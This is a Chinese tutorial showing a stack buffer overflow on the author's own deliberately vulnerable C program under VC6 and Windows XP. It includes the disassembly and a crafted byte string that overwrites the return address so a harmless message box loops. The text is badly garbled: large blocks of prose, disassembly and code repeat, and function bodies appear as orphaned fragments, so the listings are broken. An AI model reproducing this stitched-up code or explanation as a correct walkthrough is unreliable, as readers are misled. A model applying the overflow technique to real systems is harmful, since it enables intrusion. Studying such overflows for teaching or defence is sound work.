溢出实验
前言:最近linuxcici可以说是对溢出已经入了迷了。所以我在这儿做个小型的溢出实验。如有不足,请大家指正。
实验环境:Microsoft Visual C++ 6.0,Windows XP SP2,补丁至最新。OllyDbg1.10。
实验目标:构造存在溢出漏洞的代码,并构造特殊代码以利用这个漏洞。
漏洞代码:
为方便调试,我们用的是VC6.0的Win32 Console Application工程,切换到Release模式(Build->Set Active Configuration),关闭最优化编译选项(Project->Setting->C/C++,Category选General,Optimizations选Disable)。这样处理以后,用户代码在编译以后会生在0x00401000处。
#include "windows.h"
void over();//一个易溢出模块
//下面一串字符串模拟一串远方传输过来的一个数字流
unsigned char szOver[] = {0x90, 0x90, 0x90, 0x00};//一共4个字符,并不会对over()造成溢出。
int main(int)
{
MessageBox(NULL, "A normal call", "Try", MB_OK);
over();
return 0;
}
为方便调试,我们用的是VC6.0的Win32 Console Application工程,切换到Release模式(Build->Set Active Configuration),关闭最优化编译选项(Project->Setting->C/C++,Category选General,Optimizations选Disable)。这样处理以后,用户代码在编译以后会生在0x00401000处。
#include "windows.h"
void over();//一个易溢出模块
//下面一串字符串模拟一串远方传输过来的一个数字流
unsigned char szOver[] = {0x90, 0x90, 0x90, 0x00};//一共4个字符,并不会对over()造成溢出。
int main(int)
{
MessageBox(NULL, "A normal call", "Try", MB_OK);
over();
return 0;
}
void over()
{
char szBuffer[4];
strcpy(szBuffer, (char *)szOver);
}
编译,用OllyDbg跟踪(由于各位读者的编译环境不一定和我一样,所以跟踪结果可能不同,请自行处理)。跳到00401000处。
//我们的int main(int)
00401000 /$ 55 push ebp
00401001 |. 8BEC mov ebp,esp
00401003 |. 6A 00 push 0 ; /Style = MB_OK|MB_APPLMODAL
00401005 |. 68 3C604000 push TestOver.0040603C ; |Title = "Try"
0040100A |. 68 40604000 push TestOver.00406040 ; |Text = "A normal call"
0040100F |. 6A 00 push 0 ; |hOwner = NULL
00401011 |. FF15 9C504000 call dword ptr ds:[<&USER32.Messa>; \MessageBoxA
00401017 |. E8 04000000 call TestOver.00401020
0040101C |. 33C0 xor eax,eax
0040101E |. 5D pop ebp
0040101F \. C3 retn
//我们的over()
00401020 /$ 55 push ebp
00401021 |. 8BEC mov ebp,esp
00401023 |. 51 push ecx;晕死,为了申请四个字节的栈空间,随便往栈里压了个数据。怪不得总是说要初始化
00401024 |. 68 30604000 push TestOver.00406030;构造的攻击串地址,参数入栈
00401029 |. 8D45 FC lea eax,dword ptr ss:[ebp-4];得到刚才申请的空间的地址
0040102C |. 50 push eax;参数入栈
0040102D |. E8 0E000000 call TestOver.00401040
00401032 |. 83C4 08 add esp,8;刚才两个参数出栈
00401035 |. 8BE5 mov esp,ebp
00401037 |. 5D pop ebp
00401038 \. C3 retn
溢出攻击是更改retn时所用的栈使之跳转异常。这次攻击我打算让它跳转到代码MessageBox(NULL, "A normal call", "Try", MB_OK)处,在可执行文件里,它在00401003处开始参数入栈。在over()函数里申请了char szBuffer[4]以后,栈里结构如下:
Stack+0->szBuffer[4];
Stack+1->pushed ebp;
Stack+2->Retn add.
所以我们的攻击串只要比正常串长多8个字节,而最后4个字节是地址00401003就可以让它在执行时跳到00401003处,不断循环弹出对话框。用一贯的规则,是用0x90(对应ASM指令nop,空操作)填充不用的空间。
构造攻击串如下:
unsigned char szOver[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x03, 0x10, 0x40, 0x00};
完整代码如下:
#include "windows.h"
{
char szBuffer[4];
strcpy(szBuffer, (char *)szOver);
}
编译,用OllyDbg跟踪(由于各位读者的编译环境不一定和我一样,所以跟踪结果可能不同,请自行处理)。跳到00401000处。
//我们的int main(int)
00401000 /$ 55 push ebp
00401001 |. 8BEC mov ebp,esp
00401003 |. 6A 00 push 0 ; /Style = MB_OK|MB_APPLMODAL
00401005 |. 68 3C604000 push TestOver.0040603C ; |Title = "Try"
0040100A |. 68 40604000 push TestOver.00406040 ; |Text = "A normal call"
0040100F |. 6A 00 push 0 ; |hOwner = NULL
00401011 |. FF15 9C504000 call dword ptr ds:[<&USER32.Messa>; \MessageBoxA
00401017 |. E8 04000000 call TestOver.00401020
0040101C |. 33C0 xor eax,eax
0040101E |. 5D pop ebp
0040101F \. C3 retn
//我们的over()
00401020 /$ 55 push ebp
00401021 |. 8BEC mov ebp,esp
00401023 |. 51 push ecx;晕死,为了申请四个字节的栈空间,随便往栈里压了个数据。怪不得总是说要初始化
00401024 |. 68 30604000 push TestOver.00406030;构造的攻击串地址,参数入栈
00401029 |. 8D45 FC lea eax,dword ptr ss:[ebp-4];得到刚才申请的空间的地址
0040102C |. 50 push eax;参数入栈
0040102D |. E8 0E000000 call TestOver.00401040
00401032 |. 83C4 08 add esp,8;刚才两个参数出栈
00401035 |. 8BE5 mov esp,ebp
00401037 |. 5D pop ebp
00401038 \. C3 retn
溢出攻击是更改retn时所用的栈使之跳转异常。这次攻击我打算让它跳转到代码MessageBox(NULL, "A normal call", "Try", MB_OK)处,在可执行文件里,它在00401003处开始参数入栈。在over()函数里申请了char szBuffer[4]以后,栈里结构如下:
Stack+0->szBuffer[4];
Stack+1->pushed ebp;
Stack+2->Retn add.
所以我们的攻击串只要比正常串长多8个字节,而最后4个字节是地址00401003就可以让它在执行时跳到00401003处,不断循环弹出对话框。用一贯的规则,是用0x90(对应ASM指令nop,空操作)填充不用的空间。
构造攻击串如下:
unsigned char szOver[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x03, 0x10, 0x40, 0x00};
完整代码如下:
#include "windows.h"
void over();
unsigned char szOver[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x03, 0x10, 0x40, 0x00};
int main(int)
{
MessageBox(NULL, "A normal call", "Try", MB_OK);
over();
return 0;
}
{
MessageBox(NULL, "A normal call", "Try", MB_OK);
over();
return 0;
}
void over()
{
char szBuffer[4];
strcpy(szBuffer, (char *)szOver);
}
{
char szBuffer[4];
strcpy(szBuffer, (char *)szOver);
}
编译运行,就可以看到这个程序在不停地弹出消息框。
PS:大型的溢出,会把一份完整的代码写入栈中,再通过非法跳转,运行这份代码。这才是溢出的真谛。
PS:大型的溢出,会把一份完整的代码写入栈中,再通过非法跳转,运行这份代码。这才是溢出的真谛。